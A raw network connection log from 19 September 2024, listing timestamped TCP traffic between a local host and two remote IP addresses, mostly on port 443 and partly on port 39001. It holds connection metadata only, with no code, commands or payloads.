Sep 19, 2024 02:25:17.115945101 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.116327047 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.116377115 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.116389036 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.116441011 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.121999979 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.122071981 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.168771029 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.168848991 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.199459076 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.199527025 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.199620008 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.199666977 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.199695110 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.199708939 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.199724913 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.199748039 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.199800014 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.199852943 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.199995041 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.200054884 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.200082064 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.200129032 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.200135946 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.200175047 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.200378895 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.200429916 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.200440884 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.200485945 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.200586081 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.200614929 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.200628042 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.200634003 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.200649977 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.200658083 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.200676918 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.200690985 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.200696945 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.200722933 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.200737000 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.201375961 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.201442957 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.201450109 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.201493979 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.204130888 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.204189062 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.204188108 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.204215050 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.204226971 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.204246998 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.204262018 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.204267025 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.204277992 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.204282999 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.204312086 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.204353094 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.204353094 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.204363108 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.204457998 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.204494953 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.204510927 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.204516888 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.204540968 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.204580069 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.204623938 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.204631090 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.204668045 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.204938889 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.204988003 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.205024958 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.205075979 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.210649967 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.210721016 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.288718939 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.288743019 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.288806915 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.288830042 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.288846970 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.288852930 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.288913012 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.289016962 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.289040089 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.289088011 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.289093018 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.289128065 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.289417028 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.289438009 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.289474010 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.289479971 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.289510965 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.289813995 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.289830923 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.289892912 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.289900064 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.289912939 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.290111065 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.292690039 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.292707920 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.292752981 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.292758942 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.292826891 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.293123007 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.293143988 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.293176889 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.293184042 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.293215036 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.299231052 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.299247980 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.299305916 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.299314022 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.299345016 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.340646982 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.377232075 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.377254963 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.377325058 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.377331972 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.377346992 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.377367020 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.377388954 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.377399921 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.377413034 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.377451897 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.377769947 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.377789974 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.377827883 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.377835035 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.377861023 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.377882004 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.377921104 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.377938032 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.377989054 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.377995014 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.378070116 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.378365040 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.378416061 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.378422976 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.378427982 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.378470898 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.381155968 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.381181002 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.381228924 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.381233931 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.381262064 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.381283998 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.381474018 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.381493092 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.381536961 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.381541967 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.381567955 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.381586075 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.387569904 CEST	39001	49710	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:17.388207912 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.388235092 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.388276100 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.388282061 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.388319969 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.388330936 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.434417963 CEST	49710	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:17.466159105 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.466178894 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.466248035 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.466259003 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.466276884 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.466315031 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.466353893 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.466454029 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.466468096 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.466521025 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.466526031 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.466541052 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.466836929 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.466856003 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.466909885 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.466916084 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.467223883 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.467236996 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.467312098 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.467322111 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.467351913 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.469978094 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.469995975 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.470120907 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.470127106 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.470252037 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.470263958 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.470308065 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.470314026 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.470339060 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.477072954 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.477092028 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.477173090 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.477183104 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.477199078 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.526376009 CEST	39001	49710	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:17.527241945 CEST	49710	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:17.528170109 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.532458067 CEST	39001	49710	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:17.532515049 CEST	49710	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:17.554754019 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.554770947 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.554852009 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.554858923 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.554903030 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.555063963 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.555079937 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.555130005 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.555136919 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.555167913 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.555185080 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.555536985 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.555556059 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.555612087 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.555618048 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.555648088 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.555674076 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.555813074 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.555828094 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.555875063 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.555881023 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.555911064 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.555927038 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.556030035 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.556044102 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.556102991 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.556108952 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.556133032 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.556157112 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.558742046 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.558754921 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.558813095 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.558818102 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.558847904 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.558868885 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.559092999 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.559112072 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.559169054 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.559175968 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.559216022 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.565690994 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.565706015 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.565761089 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.565768003 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.565800905 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.565819025 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.638561010 CEST	49711	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:17.643596888 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.643620014 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.643685102 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.643697023 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.643727064 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.643748045 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.643819094 CEST	39001	49711	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:17.643894911 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.643898010 CEST	49711	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:17.643908978 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.643959045 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.643965006 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.643994093 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.644006968 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.644110918 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.644123077 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.644170046 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.644175053 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.644201040 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.644211054 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.644500017 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.644512892 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.644565105 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.644570112 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.644583941 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.644614935 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.644879103 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.644892931 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.644936085 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.644941092 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.644965887 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.644987106 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.647488117 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.647501945 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.647557020 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.647562981 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.647593975 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.647614956 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.647838116 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.647850037 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.647901058 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.647906065 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.647932053 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.647948027 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.658269882 CEST	49711	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:17.662642956 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.662683964 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.662728071 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.662738085 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.662770987 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.662787914 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.663132906 CEST	39001	49711	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:17.663225889 CEST	49711	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:17.668167114 CEST	39001	49711	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:17.732558966 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.732583046 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.732661963 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.732681990 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.732713938 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.732728958 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.732733965 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.732747078 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.732769012 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.732810020 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.733241081 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.733282089 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.733309031 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.733314991 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.733357906 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.733381033 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.733582973 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.733628035 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.733663082 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.733668089 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.733700991 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.733720064 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.733886957 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.733935118 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.733968973 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.733974934 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.734003067 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.734015942 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.736502886 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.736524105 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.736582994 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.736588955 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.736716986 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.737049103 CEST	443	49709	172.67.143.156	192.168.2.5
